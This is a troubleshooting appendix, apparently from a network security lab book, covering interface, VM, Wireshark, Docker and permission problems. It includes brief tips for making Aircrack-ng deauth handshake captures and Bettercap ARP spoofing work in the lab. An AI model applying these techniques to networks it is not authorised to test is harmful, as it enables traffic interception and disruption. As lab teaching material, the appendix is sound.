Support This Book
Appendices Chapter 7

Untitled

Appendix G: Lab Troubleshooting

Overview

This appendix provides solutions to common problems encountered while working through the hands-on labs.

Network Interface Issues

Interface Not Showing Up

# Check if interface exists
ip link show

# If not visible, check dmesg
dmesg | grep -i eth
dmesg | grep -i wlan

# Load driver manually
sudo modprobe <driver_name>

# For USB adapters
lsusb  # Verify device detected

Monitor Mode Won’t Enable

# Check if interface supports monitor mode
iw list | grep -A 10 "Supported interface modes"

# Kill interfering processes
sudo airmon-ng check kill

# Manual monitor mode
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up

# Alternative: use iwconfig
sudo iwconfig wlan0 mode monitor

Interface Has No IP Address

# Check DHCP
sudo dhclient eth0

# Set static IP
sudo ip addr add 192.168.1.100/24 dev eth0
sudo ip route add default via 192.168.1.1

# Check cable/connection
ethtool eth0  # Shows link state

Virtual Machine Issues

Network Not Working in VM

# Check VM network adapter settings
# Ensure correct mode: NAT, Bridged, or Host-only

# For bridged mode, select correct physical interface

# Restart networking
sudo systemctl restart NetworkManager

# Or
sudo systemctl restart networking

VM Can’t Reach Internet

Checklist:
□ VM network adapter connected
□ Correct network mode selected
□ Host firewall not blocking
□ VPN on host not interfering
□ DNS configured correctly

VM Network Too Slow

# Use virtio drivers (KVM/QEMU)
# Check VM resources (CPU, RAM)

# Disable TSO if issues
sudo ethtool -K eth0 tso off gso off

Wireshark Issues

No Interfaces Shown

# Ensure proper permissions
sudo chmod 755 /usr/bin/dumpcap
sudo setcap cap_net_raw,cap_net_admin=eip /usr/bin/dumpcap

# Add user to wireshark group
sudo usermod -aG wireshark $USER
# Log out and back in

Can’t Capture Traffic

# Run as root for troubleshooting
sudo wireshark

# Check interface permissions
ls -la /dev/net/tun

# Verify interface is up
ip link show eth0

Capture File Too Large

Solutions:
- Use capture filter to reduce traffic
- Set ring buffer to limit file size
- Capture specific duration only
- Compress .pcap files with gzip

Tool-Specific Issues

Nmap Slow Scans

# Reduce timeout
nmap -T4 target

# Limit port range
nmap --top-ports 100 target

# Disable DNS resolution
nmap -n target

# For large scans, use masscan first

Aircrack-ng Not Detecting Handshake

Troubleshooting:
1. Ensure you're on correct channel
2. Verify client is connected to target AP
3. Try multiple deauth attempts
4. Check signal strength (PWR)
5. Ensure monitor mode is active
6. Try different wireless adapter

Bettercap ARP Spoof Not Working

# Ensure IP forwarding enabled
echo 1 > /proc/sys/net/ipv4/ip_forward

# Check if on same subnet
ip addr show

# Verify targets are correct
net.show

# Check for existing defenses (DAI)

Lab Environment Issues

Docker Containers Not Starting

# Check Docker daemon
sudo systemctl status docker

# View container logs
docker logs container_name

# Check resource limits
docker system df

# Prune unused resources
docker system prune -a

VirtualBox Network Issues

Common fixes:
1. Reset network adapters
2. Reinstall VirtualBox network drivers
3. Check host firewall rules
4. Update VirtualBox
5. Use different network mode

Metasploitable Can’t Connect

# Check VM is running
# Verify correct network mode (Host-only recommended)
# Check IP address on Metasploitable
# Ping from attack VM to verify connectivity

Permission Issues

Need Root for Raw Sockets

# Option 1: Run as root
sudo python3 script.py

# Option 2: Set capabilities
sudo setcap cap_net_raw+ep /usr/bin/python3.x

# Option 3: Use scapy's conf
from scapy.all import conf
conf.L3socket = conf.L3RawSocket

Iptables Changes Not Persisting

# Save rules
sudo iptables-save > /etc/iptables.rules

# Restore on boot (add to rc.local or systemd)
iptables-restore < /etc/iptables.rules

# Or use iptables-persistent
sudo apt install iptables-persistent

Common Error Messages

”Operation not permitted"

Cause: Insufficient privileges
Fix: Run with sudo or set capabilities

"No route to host"

Cause: Network unreachable
Fix: 
- Check IP configuration
- Verify routing table
- Check firewall rules

"Connection refused"

Cause: Service not running or firewall blocking
Fix:
- Verify service is running
- Check listening ports: ss -tlnp
- Check firewall: iptables -L

"Address already in use”

Cause: Port already bound
Fix:
- Find process: ss -tlnp | grep :PORT
- Kill process: kill <pid>
- Use different port

Performance Issues

Scans Taking Too Long

Speed improvements:
- Use -T4 or -T5 timing
- Reduce port range
- Disable version detection (-sV)
- Use masscan for initial discovery
- Parallelize scans

High CPU During Analysis

Solutions:
- Filter traffic during capture
- Use ring buffer
- Process smaller file segments
- Increase VM resources
- Use command-line tools (tshark)

Getting Help

Log Collection

# System logs
journalctl -xe
dmesg | tail -50

# Network status
ip addr; ip route
cat /etc/resolv.conf

# Process list
ps aux | grep <tool>

Online Resources

  • Tool documentation (man pages)
  • GitHub issues for tools
  • Stack Exchange Network Engineering
  • Reddit r/netsec, r/AskNetSec
  • SANS Reading Room

Quick Diagnostic Script

#!/bin/bash
# quick_diag.sh - Lab environment diagnostic

echo "=== Network Interfaces ==="
ip addr

echo -e "\n=== Routes ==="
ip route

echo -e "\n=== DNS ==="
cat /etc/resolv.conf

echo -e "\n=== Listening Ports ==="
ss -tlnp

echo -e "\n=== IP Forwarding ==="
cat /proc/sys/net/ipv4/ip_forward

echo -e "\n=== Firewall Rules ==="
sudo iptables -L -n

echo -e "\n=== Wireless Interfaces ==="
iwconfig 2>/dev/null || echo "No wireless"

echo -e "\n=== Docker Status ==="
docker ps 2>/dev/null || echo "Docker not running"